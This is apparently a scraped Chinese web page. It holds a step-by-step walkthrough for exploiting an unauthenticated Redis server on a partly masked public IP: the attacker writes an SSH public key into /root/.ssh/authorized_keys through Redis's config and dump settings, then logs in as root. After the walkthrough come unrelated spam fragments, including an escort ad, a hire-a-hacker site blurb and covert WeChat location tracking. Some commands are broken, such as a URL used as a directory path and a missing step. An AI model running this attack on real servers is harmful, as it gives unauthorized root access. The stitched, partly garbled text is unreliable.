在一次渗透测试中拿到一个ip地址52.80.249.xx,nmap端口扫描出22,6379,80端口,目标机是linux系统的一台服务器,6379为redis的默认端口,尝试对其进行利用。使用kali作为攻击机
1.1、在攻击机上面下载redis
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
1.2解压文件,执行文件
解压文件:tar xzf redis-2.8.17.tar.gz
进入redis目录:cd redis-2.8.17
安装:make
1.3、进入src目录,将redis-server和redis-cli拷贝到/usr/bin目录下(这样以后启动redis就不用进入安装目录了)
cd src
cp redis-server /usr/bin
cp redis-cli /usr/bin
1.4、、返回目录redis-2.8.17,将redis.conf拷贝到/etc/目录下
cd https://www.freebuf.com/articles/
cp redis.conf /etc/
1.5、使用/etc/目录下的reids.conf文件中的配置启动redis服务:
redis-server /etc/redis.conf
1.6、然后ctrl+c退出,再次进入src目录然后连接目标靶机的redis服务
ctrl+c
cd src
redis-cli –h 52.80.249.xx
出现52.80.249.xx:6379>就代表连接成功,并且没有输入密码
2.1、这里附上一个这里没法利用的一种 攻击方式截图(没有测试仅供参考)
2.2、我们这里是不知道路径的,根据前期信息收集知道还有ssh服务的22端口是开放的,可以利用“公私钥”认证获取root权限
使用ssh生成公钥和私钥文件
ssh-keygen -t rsa
2.3、进入.ssh文件下,将上面生成的公钥保存到1.txt里面
cd /root/.ssh
(echo -e " ";cat id_rsa.pub; echo -e " ") > 1.txt
2.4、将生成的公钥文件通过redis上传到目标服务器
cat 1.txt | redis-cli -h 52.80.249.xx -x set crack
2.5、远程连接redis服务
redis-cli -h 52.80.249.xx
2.6、获得redis备份的路径
config get dir
2.7、更改redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):
2.8、设置上传公钥的备份文件名字为authorized_keys:
config set dbfilename authorized_keys
2.9、检查是否更改成功(查看有没有authorized_keys文件),没有问题就保存然后退出,至此成功写入ssh公钥到靶机
config get dbfilename
2.10、攻击机直接ssh连接目标服务器
ssh -i id_rsa root@52.80.249.xx
郑州商务伴游有人知道吗?现在可以一起来了解一下-白领微信包邮正品 伴游描述:最近有很多朋友在商务预约网后台留言,想了解关于郑州商务伴游有人知道吗?现在可以一起来了解一下信息。于是小编通过百度、知乎、文...
在 2021 年的生日这天,郭采洁带着她的全新单曲《别派一群兔子猎杀一只狐狸》,打开了 35 岁的全新篇章。这是专辑《Vol.13-1986 数羊》中第三支先行单曲,一个孤...
1.微信不惊动对方怎么知道对方的位置 咱们在生存中时常需求用到微信,上头有很多的功效都短长常适用的,值得咱们去索求。就好比说底下小编所说的功效就最适用,不但能够或许稽查密友的及时地位,还能与之及时交...
新主人翁精神讀後感5篇讀書啊,我信赖但有朗朗書聲出破廬,遲早有一日有萬鯉躍龍門之奇象。新主人翁精神 讀後感 篇一:《新主人翁精神》讀後感 李曉芳 帶著好奇的心理拜讀高賢峰先生的...
让人以为你是黑客的软件(如何让自己成为黑客)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客...
三星电脑上尽管不象三星手机上如此销售量极大,但仍然会出现客户挑选选购。今日我给大伙儿产生了一篇三星电脑一键重装系统软件xp实例教程,一些型号规格偏旧的三星电脑能够考虑到为电脑重装xp系统来提高一下电脑...